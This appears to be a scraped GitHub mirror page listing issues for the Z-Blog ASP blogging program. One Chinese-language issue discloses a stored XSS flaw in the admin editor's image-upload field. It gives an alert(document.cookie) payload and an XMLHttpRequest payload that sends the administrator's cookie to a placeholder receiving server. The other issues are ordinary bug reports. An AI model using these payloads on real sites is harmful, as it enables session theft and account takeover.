Giter Site home page Giter Site logo

zblogcn / zblogasp Goto Github PK

View Code? Open in Web Editor NEW
71.0 71.0 34.0 51.43 MB

Z-Blog是一款小巧而强大的ASP博客程序,同时支持Microsoft Access和Microsoft SQL Server两种数据库。

Home Page: http://www.zblogcn.com/

License: MIT License

HTML 6.42% CSS 8.43% JavaScript 33.56% Visual Basic .NET 1.85% VBA 0.43% Classic ASP 49.30% ASP.NET 0.01%

zblogasp's People

Contributors

involvements avatar movni avatar rainbowsoft avatar wdssmq avatar zsxsoft avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

zblogasp's Issues

后台富文本编辑器图片上传功能存在XSS漏洞

在后台进行文章编辑时,点击多图上传
image
选择插入图片,在地址输入以下Payload:"><img src=1 onerror=alert(document.cookie)>,就可以触发
image
保存后,每当管理员进行编辑,就会触发其中的代码
image
可以使用以下payload将管理员的Cookie信息窃取发送到指定的服务器
<img src=1 onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://接收数据的地址/' + document.cookie, true);xhttp.send();">
获取到的Cookie信息
image

系统出错了,网站进不去了

代码如下:
(4)E_PARSE : syntax error, unexpected T_CONSTANT_ENCAPSED_STRING (register_shutdown_function) (150101) (WINNT; IIS6.0; PHP 5.2.17; mysql; curl)

安装成功后不显示主页

-version sql server2014 IIS 10.0
1.下载完整安装包解压
2.在iis中添加网站并更改 “发送错误到浏览器”、“启用父路径”
3.按照安装指示页面进行安装,显示安装成功
4.点击完成后未正确跳转到主页 url访问zb_system/login.asp显示数据库连接错误,安装过程显示数据库连接成功

TArticle类多余代码

记得清理

Public Property Get WAPUrl
    WAPUrl = BlogHost & "?mod=wap&act=View&id=" & ID
End Property
Public Property Get HtmlWAPUrl
    HtmlWAPUrl=TransferHTML(WAPUrl,"[html-format]")
End Property
Public Property Get PadUrl
    PadUrl = BlogHost & "?mod=pad&act=View&id=" & ID
End Property
Public Property Get HtmlPadUrl
    HtmlPadUrl=TransferHTML(PadUrl,"[html-format]")
End Property

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.